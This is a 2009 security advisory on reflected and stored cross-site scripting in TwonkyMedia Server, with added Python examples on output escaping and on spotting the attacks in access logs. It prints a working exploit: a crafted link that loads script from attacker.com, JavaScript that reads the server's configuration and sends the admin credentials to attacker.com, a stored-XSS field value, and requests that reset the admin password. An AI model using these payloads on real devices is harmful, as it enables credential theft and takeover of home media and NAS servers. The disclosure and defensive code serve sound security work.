The TwonkyMedia web server fails to adequately sanitize user input (HTTP request strings and form input); thus, an attacker may be able to execute arbitrary script code in a victim's browser.
Credit:
The information has been provided by Davide Canali.
Vulnerable Systems:
* TwonkyMedia Server version 4.4.17 and prior
* TwonkyMedia Server version 5.0.65 and prior
Immune Systems:
* TwonkyMedia Server version 4.4.18
* TwonkyMedia Server version 5.0.66
* TwonkyMedia Server version 5.1
TwonkyMedia Server is bundled on a variety of CE and NAS devices from leading manufacturers, including: Buffalo LinkStation, HP Media Vault, LaCie Ethernet Disk, Philips Streamium music players, Western Digital Share Space.
Two main vulnerabilities have been found.
In what follows, the TwonkyMedia server's IP address is denoted simply as "twonky".
1st VULNERABILITY:
An HTTP GET request for http://twonky:9000/NON-EXISTENT-PAGE returns a 404 error page containing:
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>/NON-EXISTENT-PAGE was not found on this server.</BODY></HTML>
Thus, an attacker could induce the server administrator (the victim) into clicking a specially crafted link pointing to:
http://twonky:9000/fake_config_page<script type="text/javascript"
src="http://attacker.com/malicious.js" ></script>
When the victim clicks this link, the browser loads and executes the attacker's script in the origin of the configuration panel. One example of such a script:
// Runs in the origin of the TwonkyMedia configuration panel, so the request
// below is sent with the victim's credentials.
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function()
{
    if (xmlhttp.readyState == 4)
    {
        // Forward the configuration dump returned by /rpc/get_all to the attacker.
        document.location = "http://attacker.com/get.php?data=" + escape(xmlhttp.responseText);
    }
};
xmlhttp.open("GET", "/rpc/get_all", true);
xmlhttp.send(null);
This script allows the attacker to read all the server configuration variables, including the administrator's username and password.
(If the victim is not already logged in to the TwonkyMedia server configuration panel, the browser prompts for the username and password.)
2nd VULNERABILITY:
Form inputs are not properly validated, so an attacker can even perform stored cross-site scripting. Most pages of the management interface are vulnerable.
As an example, entering the following string in one of the "Content Locations" fields of the "Sharing" setup page results in a stored XSS: once the value is saved, the injected script runs every time the victim visits the configuration page:
Directory" /><script> alert('stored!');</script><br
In this way, an attacker can permanently modify the page and inject arbitrary content into it.
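Both vulnerabilities are the same defect in two output contexts: the request path is concatenated into the 404 body as text, and a saved field value is placed inside an HTML attribute. The following Python example is added here and is not code from the advisory or from the vendor; it reproduces the two rendering shapes with the advisory's own payloads, puts the context-correct escaping beside each, and checks the result the way a browser would parse it. The input markup for the "Content Locations" field (the name "contentdir") and the host attacker.example are assumptions for the example.

```python
import html
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

# Constructed inputs, following the two payload shapes in the advisory.
# The host attacker.example is a placeholder.
REFLECTED_PAYLOAD = '/fake_config_page<script src="http://attacker.example/m.js"></script>'
STORED_PAYLOAD = 'Directory" /><script> alert(\'stored!\');</script><br'

PAGE_PREFIX = '<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>'
PAGE_SUFFIX = ' was not found on this server.</BODY></HTML>'


def render_404_vulnerable(path: str) -> str:
    """The behaviour the advisory describes: the request path is concatenated
    into the 404 body verbatim, so any markup in it becomes part of the page."""
    return PAGE_PREFIX + path + PAGE_SUFFIX


def render_404_safe(path: str) -> str:
    """Same page, with the path escaped for an HTML text context."""
    return PAGE_PREFIX + html.escape(path, quote=False) + PAGE_SUFFIX


def render_field_vulnerable(value: str) -> str:
    """Assumed shape of a 'Content Locations' input (the field name is a guess):
    the stored value sits inside value="..." unescaped, so a double quote in it
    closes the attribute and everything after it is parsed as new markup."""
    return '<input type="text" name="contentdir" value="' + value + '" />'


def render_field_safe(value: str) -> str:
    """Attribute context: quote=True turns " into &quot; (and ' into &#x27;),
    so the value can no longer terminate the attribute."""
    return '<input type="text" name="contentdir" value="' + html.escape(value, quote=True) + '" />'


class _Tags(HTMLParser):
    """Records every start tag with its decoded attributes, as a browser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, Dict[str, Optional[str]]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(rendered: str) -> List[Tuple[str, Dict[str, Optional[str]]]]:
    p = _Tags()
    p.feed(rendered)
    p.close()
    return p.tags


def script_tag_count(rendered: str) -> int:
    """Number of <script> elements a browser would execute in the rendered page."""
    return sum(1 for tag, _ in parse_tags(rendered) if tag == 'script')


def input_value(rendered: str) -> Optional[str]:
    """The value attribute of the first <input> after entity decoding; with safe
    output this round-trips the stored string as data rather than markup."""
    for tag, attrs in parse_tags(rendered):
        if tag == 'input':
            return attrs.get('value')
    return None


if __name__ == '__main__':
    cases = (
        ('404 page', render_404_vulnerable(REFLECTED_PAYLOAD), render_404_safe(REFLECTED_PAYLOAD)),
        ('config field', render_field_vulnerable(STORED_PAYLOAD), render_field_safe(STORED_PAYLOAD)),
    )
    for name, vuln, safe in cases:
        print(name, 'script tags: vulnerable =', script_tag_count(vuln), ', escaped =', script_tag_count(safe))
    print('field value seen by the browser after escaping:', input_value(render_field_safe(STORED_PAYLOAD)))
```

The point of `input_value` is that escaping does not lose the administrator's data: the browser decodes `&quot;` and `&lt;` back to the original characters inside the attribute, so the exact string the user typed is what the field displays, while the parser never sees a second tag. The `quote=False` variant is enough for the 404 text context, but the same call would be wrong inside an attribute, which is why the two renderers differ.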
In addition, by leveraging either of these vulnerabilities an attacker can modify any server configuration parameter. As an example, to change the administrator username and password once the victim visits the page, it is sufficient to include a script that sends two requests to:
http://twonky:9000/rpc/set_option?accessuser=NEWUSER
http://twonky:9000/rpc/set_option?accesspwd=NEWPASSWORD
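Both request shapes described in this advisory leave a distinctive trace in the server's access log: a 404 for a path that contains HTML markup, and a GET to /rpc/set_option naming accessuser or accesspwd. The following Python example is added here (it is not part of the advisory or the product) and shows how an operator could flag both over combined-log-format lines. The log lines are constructed for the example and use documentation addresses; the log format itself is an assumption, since the advisory does not show TwonkyMedia's own logging.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-style lines constructed for this example (192.0.2.0/24 is a
# documentation range). The first two reproduce the advisory's request shapes.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Oct/2009:10:00:00 +0000] "GET /fake_config_page%3Cscript%20src=%22http://attacker.example/m.js%22%3E%3C/script%3E HTTP/1.1" 404 151',
    '192.0.2.10 - - [21/Oct/2009:10:00:01 +0000] "GET /rpc/set_option?accesspwd=NEWPASSWORD HTTP/1.1" 200 2',
    '192.0.2.11 - - [21/Oct/2009:10:00:02 +0000] "GET /rpc/get_all HTTP/1.1" 200 1234',
    '192.0.2.11 - - [21/Oct/2009:10:00:03 +0000] "GET /favicon.ico HTTP/1.1" 404 151',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# A '<' followed by an optional slash and a letter: the start of a tag in a path.
TAG_RE = re.compile(r'<\s*/?\s*[A-Za-z]')
# The options the advisory shows being changed through /rpc/set_option.
CREDENTIAL_OPTIONS = {'accessuser', 'accesspwd'}


def analyse(line: str) -> List[str]:
    """Return the findings for one log line (an empty list means nothing notable)."""
    m = LOG_RE.match(line)
    if not m:
        return ['unparsed-line']
    parts = urlsplit(m['target'])
    path = unquote(parts.path)  # decode %3C etc. before looking for markup
    findings = []
    if TAG_RE.search(path):
        findings.append('markup-in-path:' + m['status'])
    if path == '/rpc/set_option':
        touched = CREDENTIAL_OPTIONS & set(parse_qs(parts.query, keep_blank_values=True))
        if touched:
            findings.append('credential-change:' + ','.join(sorted(touched)))
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> findings, keeping only the lines that produced any."""
    out: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        found = analyse(line)
        if found:
            out[i] = found
    return out


if __name__ == '__main__':
    for i, found in scan(SAMPLE_LOG).items():
        print(i, SAMPLE_LOG[i].split('"')[1], '->', found)
```

Decoding the path before matching matters: a browser sends the crafted link percent-encoded, so the literal `<script` never appears in the raw log line. A credential change on /rpc/set_option is legitimate when the administrator does it, so the second finding is best correlated with the client address and with whether a page carrying markup was requested from the same client shortly before.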
Disclosure Timeline:
2009-06-01: Vendor notified
2009-06-08: Vendor response
2009-06-10: Status update from the development team
2009-06-10: Sent email stating that I'll publish the advisory once new versions are released
2009-10-06: New releases checked; 2nd vulnerability was not fixed. Vendor notified
2009-10-21: No response received; release of this advisory